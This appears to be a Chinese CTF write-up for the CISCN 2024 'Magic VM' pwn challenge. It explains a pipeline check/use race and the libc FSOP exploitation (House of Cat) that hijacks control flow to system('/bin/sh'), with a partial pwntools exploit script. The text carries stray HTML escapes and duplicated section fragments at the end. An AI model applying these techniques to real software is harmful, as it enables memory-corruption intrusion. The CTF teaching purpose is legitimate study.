Magic VM 漏洞分析与利用教学文档<\/h1>

1. 题目概述<\/h2>
Magic VM 是 CISCN 2024 中的一个 Pwn 题目，实现了一个简易的流水线虚拟机。该虚拟机包含三个主要处理阶段：ID（译码）、ALU（计算）和 MEM（存储），通过流水线方式执行指令。<\/p>

2. 虚拟机结构<\/h2>

2.1 主要数据结构<\/h3>

struct<\/span> __attribute__<\/span>((aligned(8<\/span>))) vm {
<\/span><\/span>    char<\/span> *<\/span>reg0[4<\/span>];              \/\/ 4个寄存器
<\/span><\/span><\/span><\/span>    __int64<\/span> now_stack_ptr;       \/\/ 当前栈指针
<\/span><\/span><\/span><\/span>    unsigned<\/span> __int64<\/span> pc;         \/\/ 程序计数器
<\/span><\/span><\/span><\/span>    char<\/span> *<\/span>code_base;             \/\/ 代码段基址
<\/span><\/span><\/span><\/span>    __int64<\/span> data_base;           \/\/ 数据段基址
<\/span><\/span><\/span><\/span>    __int64<\/span> stack_base;          \/\/ 栈基址
<\/span><\/span><\/span><\/span>    __int64<\/span> code_size;           \/\/ 代码段大小(0x2000)
<\/span><\/span><\/span><\/span>    __int64<\/span> data_size;           \/\/ 数据段大小(0x3000)
<\/span><\/span><\/span><\/span>    __int64<\/span> stack_size_;         \/\/ 栈大小(0x1000)
<\/span><\/span><\/span><\/span>    vm_id *<\/span>id;                   \/\/ ID阶段处理器
<\/span><\/span><\/span><\/span>    vm_alu *<\/span>alu;                 \/\/ ALU阶段处理器
<\/span><\/span><\/span><\/span>    vm_mem *<\/span>mem;                 \/\/ MEM阶段处理器
<\/span><\/span><\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> __attribute__<\/span>((aligned(8<\/span>))) vm_alu {
<\/span><\/span>    char<\/span> *<\/span>is_valid;
<\/span><\/span>    __int64<\/span> each_opcode_OPTYPE;  \/\/ 操作码
<\/span><\/span><\/span><\/span>    __int64<\/span> ops_total_type;      \/\/ 操作数类型
<\/span><\/span><\/span><\/span>    __int64<\/span> op1_addr_or_reg;     \/\/ 操作数1
<\/span><\/span><\/span><\/span>    __int64<\/span> op2_addr_or_reg;     \/\/ 操作数2
<\/span><\/span><\/span><\/span>    int<\/span> result_type;             \/\/ 结果类型
<\/span><\/span><\/span><\/span>    int<\/span> mem_num;                 \/\/ 内存操作数
<\/span><\/span><\/span><\/span>    __int64<\/span> dst_op_value;        \/\/ 目标操作数值
<\/span><\/span><\/span><\/span>    __int64<\/span> alu_result;          \/\/ ALU计算结果
<\/span><\/span><\/span><\/span>    __int64<\/span> now_stack_ptr;
<\/span><\/span>    __int64<\/span> stack_ptr;
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> __attribute__<\/span>((aligned(8<\/span>))) vm_mem {
<\/span><\/span>    int<\/span> mem_valid_result_type;
<\/span><\/span>    int<\/span> mem_idx;
<\/span><\/span>    __int64<\/span> dst_op_value;        \/\/ 目标地址
<\/span><\/span><\/span><\/span>    __int64<\/span> src_alu_result;      \/\/ 源ALU结果
<\/span><\/span><\/span><\/span>    __int64<\/span> now_stack_ptr;
<\/span><\/span>    __int64<\/span> next_vm;
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> __attribute__<\/span>((aligned(8<\/span>))) vm_id {
<\/span><\/span>    char<\/span> *<\/span>is_valid;
<\/span><\/span>    __int64<\/span> each_opcode;         \/\/ 操作码
<\/span><\/span><\/span><\/span>    __int64<\/span> ops1_total_type;     \/\/ 操作数1类型
<\/span><\/span><\/span><\/span>    __int64<\/span> op1_addr_or_reg;     \/\/ 操作数1
<\/span><\/span><\/span><\/span>    __int64<\/span> op2_addr_or_reg;     \/\/ 操作数2
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>2.2 内存布局<\/h3>
虚拟机使用mmap分配内存空间：<\/p>

代码段：0x2000字节<\/li>
数据段：0x3000字节<\/li>
栈段：0x1000字节<\/li>
<\/ul>
布局如下：<\/p>
+- 0x2000 code
   0x3000 data
   0x1000 stack
<\/code><\/pre>
3. 指令系统<\/h2>
3.1 操作码<\/h3>
opcode =<\/span> {
<\/span><\/span>    "ADD"<\/span>: 1<\/span>,
<\/span><\/span>    "SUB"<\/span>: 2<\/span>,
<\/span><\/span>    "SHL"<\/span>: 3<\/span>,
<\/span><\/span>    "SHR"<\/span>: 4<\/span>,
<\/span><\/span>    "MOV"<\/span>: 5<\/span>,
<\/span><\/span>    "AND"<\/span>: 6<\/span>,
<\/span><\/span>    "OR"<\/span>: 7<\/span>,
<\/span><\/span>    "XOR"<\/span>: 8<\/span>,
<\/span><\/span>    "PUSH"<\/span>: 9<\/span>,
<\/span><\/span>    "POP"<\/span>: 10<\/span>,
<\/span><\/span>    "NOP"<\/span>: 11<\/span>,
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 指令格式<\/h3>
指令格式为：[opcode][optype][value1][value2]<\/code><\/p>
其中optype<\/code>定义操作数类型：<\/p>

第1-2bit：第一个操作数类型<\/li>
第3-4bit：第二个操作数类型<\/li>
<\/ul>
操作数类型：<\/p>

NUM(1)：8字节数据<\/li>
REG(2)：1字节寄存器索引(0-3)<\/li>
ADDR(3)：寄存器值作为地址<\/li>
<\/ol>
4. 流水线执行流程<\/h2>
虚拟机采用三级流水线执行指令：<\/p>
Loop 1: ID 1
Loop 2: ID 2 | ALU 1
Loop 3: ID 3 | ALU 2 | MEM 1
...
<\/code><\/pre>
关键点：<\/p>

指令在循环1被ID解析<\/li>
在循环2被ALU执行<\/li>
在循环3被MEM存储<\/li>
<\/ul>
5. 漏洞分析<\/h2>
5.1 检查与使用分离漏洞<\/h3>
主要漏洞在于检查和使用不在同一个上下文中<\/strong>：<\/p>

地址\/寄存器检查在ID阶段进行<\/li>
实际使用在ALU\/MEM阶段（后续循环）进行<\/li>
中间可能被其他指令修改寄存器值<\/li>
<\/ol>
示例攻击序列：<\/p>
0: add r1, 0xffff  \/\/ 设置r1为越界地址
1: mov r1, 0       \/\/ 修改r1为合法值
2: add r2, [r1]    \/\/ 实际使用r1的旧值(0xffff)访问内存
3: nop
4: nop
<\/code><\/pre>
执行流程：<\/p>

循环1：ID解析指令2时，r1=0（合法）<\/li>
循环2：ALU执行指令1，修改r1=0<\/li>
循环3：MEM执行指令0，修改r1=0xffff<\/li>
循环4：ALU执行指令2，使用r1=0xffff（越界访问）<\/li>
<\/ol>
5.2 漏洞利用能力<\/h3>
通过该漏洞可以实现：<\/p>

任意地址加减运算<\/li>
间接实现任意地址读写<\/li>
<\/ol>
6. 漏洞利用<\/h2>
6.1 利用思路<\/h3>
利用House of Cat攻击策略，通过FSOP攻击_IO_wfile_JUMP<\/code>表，利用seekoff<\/code>函数劫持控制流。<\/p>
6.2 攻击条件<\/h3>
需要满足以下条件：<\/p>

FILE->_IO_write_base < FILE->_IO_write_ptr<\/code><\/li>
wide_data->_IO_write_base < wide_data->_IO_write_ptr<\/code><\/li>
wide_data->_IO_read_end != wide_data->_IO_read_ptr<\/code><\/li>
FILE->_lock<\/code>可写<\/li>
file->_mode > 0<\/code><\/li>
_wide_data->_IO_write_base != 0<\/code><\/li>
<\/ol>
需要修改的关键点：<\/p>

FILE->flag="\/bin\/sh"<\/code><\/li>
wide_data->jump(0xe0 offset)->0x18 = system<\/code><\/li>
<\/ol>
6.3 EXP代码分析<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span># 定义操作码和辅助函数<\/span>
<\/span><\/span>opcode =<\/span> {...<\/span>}
<\/span><\/span>def<\/span> generate_type<\/span>(t): ...<\/span>
<\/span><\/span>def<\/span> push_value<\/span>(): ...<\/span>
<\/span><\/span>def<\/span> add_value<\/span>(value): ...<\/span>
<\/span><\/span>def<\/span> sub_value_reg<\/span>(value): ...<\/span>
<\/span><\/span>def<\/span> sub_value<\/span>(value): ...<\/span>
<\/span><\/span>def<\/span> xor_value_reg<\/span>(value): ...<\/span>
<\/span><\/span>def<\/span> pop_value<\/span>(): ...<\/span>
<\/span><\/span>def<\/span> set_value_reg<\/span>(value, reg): ...<\/span>
<\/span><\/span>def<\/span> nop<\/span>(): ...<\/span>
<\/span><\/span>
<\/span><\/span># 偏移量定义<\/span>
<\/span><\/span>OFFSET_TO_LIBC =<\/span> 0x9000<\/span>
<\/span><\/span>LIBC_STDERR =<\/span> 0x21b6a0<\/span>
<\/span><\/span>STDERR_VTABLE =<\/span> LIBC_STDERR +<\/span> 0xd8<\/span>
<\/span><\/span>WIDE_DATA =<\/span> 0x21a8a0<\/span>
<\/span><\/span>WFILE_JUMP =<\/span> 0x2170c0<\/span>
<\/span><\/span>_IO_WOVERFLOW_OFFSET =<\/span> 0x18<\/span>
<\/span><\/span>SYSTEM =<\/span> 0x50D70<\/span>
<\/span><\/span>_IO_WFILE_OVERFLOW =<\/span> 0x086390<\/span>
<\/span><\/span>SYSTEM_OFF =<\/span> _IO_WFILE_OVERFLOW -<\/span> SYSTEM
<\/span><\/span>
<\/span><\/span># 生成读取指令<\/span>
<\/span><\/span>def<\/span> generate_read<\/span>(offset, value):
<\/span><\/span>    shellcode =<\/span> b<\/span>''<\/span>
<\/span><\/span>    shellcode +=<\/span> add_value(offset)
<\/span><\/span>    shellcode +=<\/span> set_value_reg(0<\/span>, RET_REG)
<\/span><\/span>    shellcode +=<\/span> sub_value(value)
<\/span><\/span>    shellcode +=<\/span> nop()
<\/span><\/span>    shellcode +=<\/span> nop()
<\/span><\/span>    return<\/span> shellcode
<\/span><\/span>
<\/span><\/span># 构建攻击payload<\/span>
<\/span><\/span>shellcode1 =<\/span> generate_read(off(STDERR_VTABLE), 0x510<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(LIBC_STDERR+<\/span>0x28<\/span>), 0xffffffffffffff00<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(LIBC_STDERR+<\/span>0xc0<\/span>), 0xffffffffffffffff<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(WIDE_DATA), 0xfffffffffffffaf0<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(WIDE_DATA+<\/span>0x18<\/span>), 0xfffffffffffffaf0<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(WIDE_DATA+<\/span>0x20<\/span>), 0xfffffffffffffa00<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(WIDE_DATA+<\/span>0x20<\/span>), 0xffffffffffffff00<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(WIDE_DATA+<\/span>0xe0<\/span>), 0xffffffffffffba20<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(LIBC_STDERR+<\/span>0x18<\/span>), 0x1ca9b3<\/span>) +<\/span> \
<\/span><\/span>             generate_read(off(LIBC_STDERR), 0xff978cd18d43be58<\/span>)
<\/span><\/span>
<\/span><\/span># 发送payload<\/span>
<\/span><\/span>ph =<\/span> process(".\/pwn"<\/span>)
<\/span><\/span>ph.<\/span>sendline(shellcode1 +<\/span> debug_shellcode)
<\/span><\/span>ph.<\/span>interactive()
<\/span><\/span><\/code><\/pre>7. 总结与学习要点<\/h2>

流水线设计漏洞<\/strong>：检查和使用分离是流水线架构中常见的安全问题<\/li>
利用条件竞争<\/strong>：通过指令序列制造时间差实现越界访问<\/li>
高级FSOP技巧<\/strong>：结合House of Cat和House of Emma的攻击思路<\/li>
IO_FILE利用<\/strong>：深入理解_IO_wfile_JUMP<\/code>和seekoff<\/code>的利用方式<\/li>
<\/ol>
关键学习点：<\/p>

理解虚拟机的三级流水线执行机制<\/li>
掌握检查与使用分离漏洞的利用方法<\/li>
学习现代libc的FSOP攻击技巧<\/li>
熟悉IO_FILE结构体的关键字段和利用条件<\/li>
<\/ul>

Magic VM 漏洞分析与利用教学文档<\/h1>

1. 题目概述<\/h2> Magic VM 是 CISCN 2024 中的一个 Pwn 题目，实现了一个简易的流水线虚拟机。该虚拟机包含三个主要处理阶段：ID（译码）、ALU（计算）和 MEM（存储），通过流水线方式执行指令。<\/p>

2. 虚拟机结构<\/h2>

3. 指令系统<\/h2>

5. 漏洞分析<\/h2>

6. 漏洞利用<\/h2>

6.1 利用思路<\/h3> 利用House of Cat攻击策略，通过FSOP攻击_IO_wfile_JUMP<\/code>表，利用seekoff<\/code>函数劫持控制流。<\/p>

1. 题目概述<\/h2>
Magic VM 是 CISCN 2024 中的一个 Pwn 题目，实现了一个简易的流水线虚拟机。该虚拟机包含三个主要处理阶段：ID（译码）、ALU（计算）和 MEM（存储），通过流水线方式执行指令。<\/p>

6.1 利用思路<\/h3>
利用House of Cat攻击策略，通过FSOP攻击`_IO_wfile_JUMP<\/code>表，利用seekoff<\/code>函数劫持控制流。<\/p>`